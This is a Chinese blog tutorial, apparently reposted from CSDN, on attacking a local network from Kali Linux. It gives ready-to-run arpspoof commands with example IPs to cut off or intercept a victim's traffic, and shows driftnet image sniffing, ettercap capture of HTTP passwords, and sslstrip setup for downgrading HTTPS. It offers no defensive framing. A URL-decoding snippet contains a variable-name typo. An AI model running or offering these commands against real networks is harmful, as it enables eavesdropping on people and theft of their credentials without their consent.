一篇文章带你了解kali局域网攻击
作者:HUTEROX 发布时间:2022-02-21 23:53:35
前言
很久以前的博客才发现,发布一下。
这个系列以后有时间再做。
arp攻击
arp路由链表,感兴趣的自行百度,我的博客我的笔记.
路由指向
介绍两个东西.
echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通
内网扫描
这个在百度上你可以看到很多相关的方式,比如nmap fping
但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.
这里使用netdiscover
当然这里也写几个nmap之类的指令
nmap -PR -sL ip
fping -asg ip
netdiscover -i kali网卡 -r ip(网段)
netdiscover -i eth0 -r 192.168.43.1/30
扫描速度是比较慢的
断网攻击
arpspoof -i kali的网卡 -t 目标地址 目标网卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺骗信息获取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
开始欺骗让数据经过你的电脑
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉数据包
获取图片
使用工具difinet
difinet -i eth0(网卡)
实际操作:
图片会在那里临时保存
由于网络问题可能会有点卡
获取HTTP连接的密码信息
使用ettercap
其他的操作还是一样的,要开启arp欺骗
ettercap -Tq -i eth0
-T 文本模式 q 安静模式 i 网卡
然后等待即可.不过现在都是https,作用不大
出现中文怎么办,直接赋值中文乱码,之后解码即可
百度搜索url解码
或者直接使用python
中文编码
from urllib.parse import quote,unquote
str1 = '中国'
str2=quote(strl)
print(str2)
解码
print(unquote(str2))
获取HTTPS的密码信息
这个要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3
记住一定要先安装python2
在kali里面python 默认为python2 当然你可以用ln -s 修改一下.
apt install python 这个时候会自动安装python 2.7
然后输入以下指令安装sslstrip
git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install
这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块
pip install pyOpenSSL
来源:https://blog.csdn.net/FUTEROX/article/details/115185933
猜你喜欢
- 大家经常用的是Adodb.Stream,但这时就有个缺陷,就是不支持断点续传了。经常看到flashget中是红脸(即不支持断点续传)其实支持
- php从5.2.x升级到5.3.2.出来问题了。有些原来能用的程序报错了。报错内容是Deprecated: Function session
- 代码如下: EXEC sp_rename '表名.[原列名]', '新列名', 'column
- python中安装包的方式有很多种:源码包:python setup.py install在线安装:pip install 包名(linux
- 在前面的文章中很早有写到关于添加水印的方法,但是过程还是较为复杂,最近发现的这款filestools非标准库其实真正实现添加水印的只要一个函
- 本文主要介绍了Python通过tkinter实现百度搜索的示例代码,分享给大家,具体如下:"""百度搜索可视化
- 二维矩阵的transpose函数:不晓得该怎么起头,直接上干货。transpose()简单来说,就相当于数学中的转置,在矩阵中,转置就是把行
- 这篇文章不谈大道理,只谈细节。关于facebook的大道理,大家可以去海内网的帖子《谁去救救麦田老师吧》讨论。那里有很多IT评论高手,谈的很
- torch.Tensor有4种常见的乘法:*, torch.mul, torch.mm, torch.matmul. 本文抛砖引玉,简单叙述
- 熟悉SQL的人都知道,完成同一个任务,SQL可能有多种写法,但不同写法的查询性能可能会有天壤之别,本文列举出五个查询优化的方法,当然,优化的
- 首先我们有这么一种需求,就是我在一个列表中点击了某个item,跳转到详情界面,那么我就需要把item的实体数据从列表页面传递到详情页面,那么
- 引言分享一些用Python处理yaml和嵌套数据结构的的一些技巧,首先从修改yaml格式文件的问题出发,演变出了各个解决办法,又从最后的解决
- 众所周知,Mac自带python2,但无奈我们想使用新版本,因此我们需要安装python3安装python3我使用了homebrew,网上也
- 数据驱动模式的测试好处相比普通模式的测试就显而易见了吧!使用数据驱动的模式,可以根据业务分解测试数据,只需定义变量,使用外部或者自定义的数据
- 本人python新手小白,记录学习过程中遇到的一些小问题。python 爬虫获取网页资源之前,联网是必须的,作为 python 中最常用的
- 如下所示:INPUT = c_int * 4# 实例化一个长度为2的整型数组input = INPUT()# 为数组赋值(input这个数组
- 本文使用案例是基于 python2.7 实现以下内容均为个人使用 peewee 的经验和遇到的坑,不会涉及过多的基本操作。所以,没有使用过
- 本文介绍基于Python语言,将一个Excel表格文件中的数据导入到Python中,并将其通过字典格式来存储的方法~ &a
- 去掉数据重复 增加两个字段 alter TABLE T_Employee Add FSubCompany VARchar(20); ALTE
- php中session_id()函数原型及说明session_id()函数说明:stringsession_id([string$id])s